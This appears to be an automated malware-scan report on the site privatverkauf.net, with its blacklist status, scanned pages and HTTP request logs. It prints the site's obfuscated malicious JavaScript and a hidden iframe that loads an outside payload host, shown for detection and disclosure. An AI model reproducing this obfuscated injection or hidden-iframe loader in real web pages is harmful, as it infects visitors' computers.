Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=privatverkauf.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://privatverkauf.net/ | 200 OK Content-Length: 3693 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) $="%63d%3d%223bs%2574%253dst+%2553t%2572i%256eg.f%2572om%2543har%2543ode%2528(tm%2570%252e%22;cz%3d%22%2566un%2563tio%256e %2563z(%2563z%2529{re%2574%2575%2572n c%2561%252bc%2562+cc%252b%2563d+c%2565+%2563%257a;}%253b%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;cc%3d%226ceng%2574h%253b%2569+%252b){ Decoded script: cd="3bs%74%3dst+%53t%72i%6eg.f%72om%43har%43ode%28(tm%70%2e";cz="%66un%63tio%6e %63z(%63z%29{re%74%75%72n c%61%2bc%62+cc%2b%63d+c%65+%63%7a;}%3b";dd="}Sx<tSx<}^}+yv8d)K7i7M,%22%20%20'9kd)K7i7M0-0%22%20%20'+m}^}-S]^8d)K7t7M<d)K7}7M<d)K7i7M9+iSx!-|)K888d)K7i7M6%20hQQ9;}^}950&5##950%22&M+iSx%22-|)K8888d)K7i7M6%20h##!!9..#9;}^}950!%209M+}Sx";cc="6ceng%74h%3b%69+%2b){%74m%70%3dds.s%6c%69ce(%69,i%2b1)%";da="fqb0})-~ug0Qbbqi87e~%7F7<7tfu7<7dxb7<7vyb7<7fyv7<7huc7& <div style="visibility:hidden"><iframe src="http://bubgtwe.com/ld/dx/" width=100 height=80></iframe></div> Antivirus reports:
| ||
http://privatverkauf.net/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: privatverkauf.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 19:35:38 GMT
Accept-Ranges: bytes
ETag: "38e10c83-e6d-448b15a67b580"
Server: Apache/2.2.9 (Debian) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8g PHP/5.2.6-1+lenny10 with Suhosin-Patch
Vary: Accept-Encoding
Content-Length: 3693
Content-Type: text/html
Last-Modified: Tue, 18 Mar 2008 07:47:50 GMT
...3693 bytes of data.
GET / HTTP/1.1
Host: privatverkauf.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Dec 2014 19:35:38 GMT
Accept-Ranges: bytes
ETag: "38e10c83-e6d-448b15a67b580"
Server: Apache/2.2.9 (Debian) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8g PHP/5.2.6-1+lenny10 with Suhosin-Patch
Vary: Accept-Encoding
Content-Length: 3693
Content-Type: text/html
Last-Modified: Tue, 18 Mar 2008 07:47:50 GMT
...3693 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: privatverkauf.net
Referer: http://www.google.com/search?q=privatverkauf.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: privatverkauf.net
Referer: http://www.google.com/search?q=privatverkauf.net
Result:
The result is similar to the first query. There are no suspicious redirects found.